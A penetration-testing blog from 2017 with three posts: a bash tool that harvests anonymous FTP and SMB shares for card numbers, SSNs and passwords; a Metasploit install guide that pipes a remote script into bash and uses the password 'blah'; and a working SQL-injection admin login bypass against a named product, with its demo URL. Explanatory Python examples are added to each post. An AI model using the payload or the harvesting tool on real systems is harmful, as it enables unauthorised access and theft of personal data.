Wednesday, July 12, 2017

Introducing Booty Quest!

Booty Quest [BQ] is a little bash script I made to aid in my pen testing activities. While running a pen test I often find a large number of anonymous FTP servers, unsecured SMB shares, and so on, and due to resource restrictions I can't dive any deeper. While these are findings in their own right, that leaves a lot on the bone in my opinion. Finding that these services are also hosting sensitive information could turn a medium finding into a high or critical one, depending on the scale you use.

I have seen countless third-party "pen-test vendors" do the same and pass over the data that is being exposed by the service. There are some tools out there with somewhat similar functions, but nothing that does all the heavy lifting of making connections and managing the data like BQ.

So basically, you find an anonymous FTP or SMB server, then plug in the IP of the host and, in the case of SMB, the share path (the help output below also lists NFS, HTTP and local-directory modes). BQ will download all the files from the FTP server or mount the SMB share, then use grep and regular expressions to locate IP addresses, email addresses, credit card numbers, SSNs, phone numbers, IBANs, usernames, and passwords. If it finds text files and images it copies them to a separate location so you can sift through them later.

Basic setup:
After you download the script, run:
chmod a+x bq.sh

Here is the basic help:
root@system:~/sec# ./bq.sh 
###########################
# [B]ooty [Q]uest         #
# By Adam Espitia         #
# aahideaway.blogspot.com #
# Arr, matey,             #
#  where be me booty!     #
###########################

This script will mount/download content from a remote host and search it for sensitive information.

Usage here
./bq.sh nfs 192.168.1.1 /share/here/
./bq.sh smb 192.168.1.1 /share/here/
./bq.sh ftp 192.168.1.1
./bq.sh http 192.168.1.1 /dir/path/
./bq.sh local /dir/path/
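The grep-and-regex stage described above, as an added example that is not the BQ script itself: a Python reimplementation that walks a mounted share (here a constructed temp directory with fake data), skips binaries the way grep -I does, and collects unique hits per data class. The patterns, the Luhn filter on card candidates and the sample files are this example's own assumptions, not BQ's code; the phone-number and IBAN classes from the post are left out.

```python
"""Scan a directory tree for sensitive-looking strings, BQ style.
Added example; patterns and sample data are illustrative assumptions."""
import os
import re
import shutil
import tempfile

# One regex per data class. Illustrative, not BQ's exact expressions.
PATTERNS = {
    "email": re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}"),
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "card": re.compile(r"\b\d{4}[ -]?\d{4}[ -]?\d{4}[ -]?\d{4}\b"),
    # group(1) captures only the secret, so "password=" itself is not reported
    "password": re.compile(r"(?i)(?:password|passwd|pwd)\s*[=:]\s*(\S+)"),
}


def luhn_ok(candidate):
    """Luhn checksum over the digits in candidate; separators are ignored.
    Cuts most phone/ID-number false positives from the card regex."""
    digits = [int(c) for c in candidate if c.isdigit()]
    if len(digits) < 13:  # shorter than any real PAN
        return False
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:  # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def scan_tree(root):
    """Return {class: sorted unique matches} for every text file under root."""
    hits = {name: set() for name in PATTERNS}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue
            if b"\x00" in data:  # binary file: skip, like grep -I
                continue
            text = data.decode("utf-8", errors="replace")
            for name, rx in PATTERNS.items():
                for m in rx.finditer(text):
                    value = m.group(1) if rx.groups else m.group(0)
                    if name == "card" and not luhn_ok(value):
                        continue
                    hits[name].add(value)
    return {name: sorted(vals) for name, vals in hits.items()}


def make_sample_share():
    """Constructed sample tree with fake data (assumption, not a real share)."""
    root = tempfile.mkdtemp(prefix="bq-sample-")
    with open(os.path.join(root, "customers.csv"), "w") as fh:
        fh.write("name,email,card,ssn\n"
                 "Alice Example,alice@example.com,4111 1111 1111 1111,123-45-6789\n"
                 "Bob Example,bob@example.org,4111-1111-1111-1112,987-65-4321\n")
    with open(os.path.join(root, "config.ini"), "w") as fh:
        fh.write("[db]\nhost=10.0.0.5\nuser=svc_backup\npassword=Winter2017!\n")
    with open(os.path.join(root, "logo.png"), "wb") as fh:
        fh.write(b"\x89PNG\r\n\x1a\n\x00\x00")  # binary; must be skipped
    return root


if __name__ == "__main__":
    share = make_sample_share()
    try:
        for name, values in scan_tree(share).items():
            print("%-9s %3d  %s" % (name, len(values), values))
    finally:
        shutil.rmtree(share)
```

The second card number in the sample fails Luhn and is dropped, which is the point of post-filtering raw grep output: on a real share the 16-digit regex alone lights up on order numbers and phone numbers.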

Friday, June 30, 2017

Installing Metasploit on Debian 9 server

So I recently installed Metasploit on Debian 9, here's how:

apt-get install default-jre default-jdk software-properties-common
add-apt-repository "deb http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main"
apt-get update
apt-get install oracle-java8-installer
apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev
curl -sSL https://rvm.io/mpapis.asc | gpg --import -
curl -L https://get.rvm.io | bash -s stable
source /usr/local/rvm/scripts/rvm
echo "source /usr/local/rvm/scripts/rvm" >> ~/.bashrc
source ~/.bashrc
RUBYVERSION=$(wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/.ruby-version -q -O - )
rvm install $RUBYVERSION
rvm use $RUBYVERSION --default
cd ~
git clone https://github.com/sstephenson/rbenv.git .rbenv
echo 'eval "$(rbenv init -)"' >> ~/.bashrc
exec $SHELL
git clone https://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc
git clone https://github.com/dcarley/rbenv-sudo.git ~/.rbenv/plugins/rbenv-sudo
exec $SHELL
RUBYVERSION=$(wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/.ruby-version -q -O - )
rbenv install $RUBYVERSION
rbenv global $RUBYVERSION
mkdir ~/dev
cd ~/dev
git clone https://github.com/nmap/nmap.git
cd nmap
./configure
make
make install
make clean
su postgres
createuser msf -P -S -R -D
createdb -O msf msf
psql -c "ALTER USER msf WITH ENCRYPTED PASSWORD 'blah';"
exit
cd /opt/
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework/
rvm --default use ruby-${RUBYVERSION}@metasploit-framework
gem install bundler
bundle install
bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'
nano /opt/metasploit-framework/config/database.yml
database.yml contents:
production:
 adapter: postgresql
 database: msf
 username: msf
 password: blah
 host: 127.0.0.1
 port: 5432
 pool: 75
 timeout: 5
More cmds...
sh -c "echo export MSF_DATABASE_CONFIG=/opt/metasploit-framework/config/database.yml >> /etc/profile"
source /etc/profile
msfconsole...


Yeah that sucked, but it works!
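The createuser/psql and database.yml steps above, as an added example that is not part of the post: generate the msf role password instead of typing 'blah' into both places, emit the ALTER USER statement with the password safely quoted, write database.yml with mode 0600 from the start (nano creates it with the default umask), and audit an existing file for the two things that go wrong. The file path is the one the post uses; the placeholder list, the 16-character floor and the temp-directory demo are this example's own assumptions.

```python
"""Generate and audit Metasploit's config/database.yml.
Added example; only the path and YAML keys come from the post."""
import os
import secrets
import shutil
import stat
import tempfile

DATABASE_YML = "/opt/metasploit-framework/config/database.yml"  # path from the post
PLACEHOLDERS = {"blah", "msf", "password", "changeme"}  # assumed weak values


def gen_db_password(nbytes=24):
    """URL-safe random password (32 chars for 24 bytes); no quote characters."""
    return secrets.token_urlsafe(nbytes)


def alter_user_sql(user, password):
    """Statement for the `psql -c` step; single quotes doubled so the password
    cannot end the SQL string literal early."""
    return "ALTER USER %s WITH ENCRYPTED PASSWORD '%s';" % (
        user, password.replace("'", "''"))


def render_database_yml(password, user="msf", database="msf",
                        host="127.0.0.1", port=5432, pool=75, timeout=5):
    """Same keys and defaults as the post's database.yml, password substituted.
    token_urlsafe output contains only [A-Za-z0-9_-], so no YAML quoting is needed."""
    lines = [
        "production:",
        " adapter: postgresql",
        " database: %s" % database,
        " username: %s" % user,
        " password: %s" % password,
        " host: %s" % host,
        " port: %d" % port,
        " pool: %d" % pool,
        " timeout: %d" % timeout,
    ]
    return "\n".join(lines) + "\n"


def write_database_yml(path, password, **overrides):
    """Create the file 0600 so the password is never group/world readable."""
    content = render_database_yml(password, **overrides)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as fh:
        fh.write(content)
    os.chmod(path, 0o600)  # file may have pre-existed with wider permissions
    return content


def audit_database_yml(path):
    """Return a list of findings; an empty list means both checks pass."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & 0o077:
        findings.append("mode %04o: group/other can read the database password" % mode)
    password = None
    with open(path) as fh:
        for line in fh:
            key, sep, value = line.strip().partition(":")
            if sep and key.strip() == "password":
                password = value.strip()
    if password is None or password in PLACEHOLDERS or len(password) < 16:
        findings.append("password is missing, a placeholder, or shorter than 16 characters")
    return findings


def demo_roundtrip():
    """Write a strong config, then the post's 'blah' one left 0644 by an editor;
    return (findings_for_strong, findings_for_weak)."""
    tmp = tempfile.mkdtemp(prefix="msf-cfg-")
    try:
        path = os.path.join(tmp, "database.yml")
        write_database_yml(path, gen_db_password())
        good = audit_database_yml(path)
        write_database_yml(path, "blah")
        os.chmod(path, 0o644)
        bad = audit_database_yml(path)
    finally:
        shutil.rmtree(tmp)
    return good, bad


if __name__ == "__main__":
    pw = gen_db_password()
    print(alter_user_sql("msf", pw))
    print(render_database_yml(pw), end="")
    print("strong:", demo_roundtrip()[0], "weak:", demo_roundtrip()[1])
```

Run the audit against the real path after the install to confirm the file you edited with nano did not end up world-readable; the same password then goes into the ALTER USER statement and the YAML, so there is never a 'blah' to forget to change.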

Tuesday, January 3, 2017

My Click Counter 1.0 admin login bypass via SQLi

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: Admin login bypass via SQLi
[x] Vendor: http://software.friendsinwar.com/
[x] Script Name: My Click Counter
[x] Script Version: 1.0
[x] Script DL: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=15
[x] Author: AnarchyAngel AKA Adam
[x] Mail : anarchy[dot]ang31@gmail[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Navigate to the script's admin login page and submit ' or ''=' as both the username and the password;
it should give you access to the admin area. Enjoy >:)

Demo: http://software.friendsinwar.com/scripts_example/my_click_counter/login.php
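Why that payload works, as an added example that is not the vendor's code: a login check built the way the bypass implies (user input concatenated straight into the WHERE clause), run against an in-memory SQLite table, beside the parameterized version that treats the same input as data. The table name, column names and stored credential are assumptions for the demo; the payload is the one from the advisory.

```python
"""Admin login bypass via quote injection, vulnerable vs. parameterized.
Added example; schema and credential are constructed, not the real application's."""
import sqlite3

PAYLOAD = "' or ''='"  # submitted as both username and password in the advisory


def make_db():
    """Constructed one-row admin table (assumption, not the script's schema)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    con.execute("INSERT INTO admin VALUES ('admin', 'correct horse battery staple')")
    return con


def build_vulnerable_query(username, password):
    """String concatenation: the quote in the input closes the literal early and
    the rest of the input becomes SQL."""
    return ("SELECT COUNT(*) FROM admin WHERE username='" + username
            + "' AND password='" + password + "'")


def login_vulnerable(con, username, password):
    return con.execute(build_vulnerable_query(username, password)).fetchone()[0] > 0


def login_fixed(con, username, password):
    """Bound parameters: the driver sends the payload as a plain string value,
    so it is compared against the column instead of parsed as SQL."""
    sql = "SELECT COUNT(*) FROM admin WHERE username=? AND password=?"
    return con.execute(sql, (username, password)).fetchone()[0] > 0


if __name__ == "__main__":
    con = make_db()
    print(build_vulnerable_query(PAYLOAD, PAYLOAD))
    print("vulnerable login with payload:", login_vulnerable(con, PAYLOAD, PAYLOAD))
    print("fixed login with payload:     ", login_fixed(con, PAYLOAD, PAYLOAD))
```

With the payload in both fields the concatenated predicate reads `username='' or ''='' AND password='' or ''=''`; AND binds tighter than OR, so the trailing `''=''` is true for every row and the first admin row is returned regardless of credentials. Parameterizing the query removes the bypass; a real fix would also compare against a stored password hash rather than the plaintext this demo table holds.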